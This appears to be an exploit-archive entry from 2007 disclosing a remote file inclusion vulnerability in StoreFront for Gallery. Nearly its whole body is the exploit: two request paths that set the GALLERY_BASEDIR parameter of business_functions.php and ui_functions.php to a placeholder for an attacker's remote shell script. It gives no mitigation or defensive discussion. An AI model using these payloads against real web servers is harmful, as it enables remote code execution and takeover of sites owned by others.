id: 1766
date: 04/15/2007
title: StoreFront for Gallery (GALLERY_BASEDIR) RFI Vulnerabilities
author: Alkomandoz Hacker
cves: 

============================================================
StoreFront for Gallery (GALLERY_BASEDIR) RFI Vulnerabilities
============================================================



StoreFront for Gallery (GALLERY_BASEDIR) Remote File Inclusion Vulnerabilities

Discovered by: Alkomandoz Hacker

Exploit:

mods/business_functions.php?GALLERY_BASEDIR=Shell

mods/ui_functions.php?GALLERY_BASEDIR=Shell



#  0day.today [2023-03-25]  #